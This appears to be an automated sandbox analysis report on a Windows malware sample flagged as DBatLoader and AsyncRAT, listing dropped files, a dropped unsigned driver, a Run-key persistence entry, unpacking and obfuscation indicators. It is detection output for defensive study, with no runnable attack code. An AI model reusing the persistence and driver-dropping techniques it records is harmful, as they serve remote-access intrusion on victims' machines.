Source: C:\Users\Public\Libraries\Akaelkov.PIF	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: PCMNil7wkU.exe

Static file information: File size 1743360 > 1048576

Source: PCMNil7wkU.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x128a00

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr
Source:	Binary string: easinvoker.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source:	Binary string: _.pdb source: vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2155090535.00000000243C6000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218197846.000000002439D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280708634.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280042315.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2318435848.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279905778.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2281099206.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279726385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280484770.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2247149385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280249711.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 4.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 7.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 9.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 4.2.vokleakA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 7.2.vokleakA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 9.2.vokleakA.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match

File source: 0.2.PCMNil7wkU.exe.4100000.4.unpack, type: UNPACKEDPE

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: vokleakA.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_0411FCD8

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: netutils.dll.0.dr	Static PE information: real checksum: 0x21402 should be: 0x2599d
Source: Akaelkov.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x1b586f
Source: PCMNil7wkU.exe	Static PE information: real checksum: 0x0 should be: 0x1b586f

Source: easinvoker.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041695F8 push 04169685h; ret	0_2_0416967D
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04114432 push 041144AAh; ret	0_2_041144A2
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04114434 push 041144AAh; ret	0_2_041144A2
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412063B push 0412067Fh; ret	0_2_04120677
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412063C push 0412067Fh; ret	0_2_04120677
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415C67C push ecx; mov dword ptr [esp], edx	0_2_0415C681
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041066FA push 04106757h; ret	0_2_0410674F
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041066FC push 04106757h; ret	0_2_0410674F
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0416872C push 0416895Eh; ret	0_2_04168956
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04158770 push 041587CAh; ret	0_2_041587C2
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04116760 push ecx; mov dword ptr [esp], edx	0_2_04116765
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412008B push 041200CFh; ret	0_2_041200C7
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412008C push 041200CFh; ret	0_2_041200C7
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04158128 push 04158154h; ret	0_2_0415814C
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412CC74 push 0412CCB7h; ret	0_2_0412CCAF
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412AC64 push 0412ACA2h; ret	0_2_0412AC9A
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04114DDC push 04114E29h; ret	0_2_04114E21
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412CFA4 push 0412CFD0h; ret	0_2_0412CFC8
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0410E90C push 0410E938h; ret	0_2_0410E930
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04134980 push 041349EBh; ret	0_2_041349E3
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041169BC push ecx; mov dword ptr [esp], edx	0_2_041169C1
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04116ADC push ecx; mov dword ptr [esp], edx	0_2_04116AE1
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411EB12 push 0411EBBFh; ret	0_2_0411EBB7
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411EB14 push 0411EBBFh; ret	0_2_0411EBB7
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04116B20 push ecx; mov dword ptr [esp], edx	0_2_04116B25
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04103464 push eax; ret	0_2_041034A0
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412D468 push 0412D494h; ret	0_2_0412D48C
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411D4D8 push ecx; mov dword ptr [esp], edx	0_2_0411D4DA
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04107511 push 04107576h; ret	0_2_0410756E
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04107534 push 04107576h; ret	0_2_0410756E
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0413B654 push ecx; mov dword ptr [esp], ecx	0_2_0413B658

Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\Akaelkov.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\vokleakA.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\Akaelkov.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\vokleakA.pif	Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\truesight.sys	Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Akaelkov			Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Akaelkov			Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0414224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0414224C
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0412AEA0 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_0412AEA0
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04141018 IsIconic,GetCapture,	0_2_04141018
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_0415319C
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0414FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	0_2_0414FCD8
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041538CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	0_2_041538CC
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04141920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_04141920
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04153990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	0_2_04153990
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040B224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_2_040B224C
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040B1018 IsIconic,GetCapture,	5_2_040B1018
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_2_040C319C
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040BFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	5_2_040BFCD8
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	5_2_040C38CC
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040B1920 IsIconic,SetWindowPos,GetWindowPlacement,	5_2_040B1920
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	5_2_040C3990

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04158820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_04158820

Source: C:\Users\Public\Libraries\vokleakA.pif

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
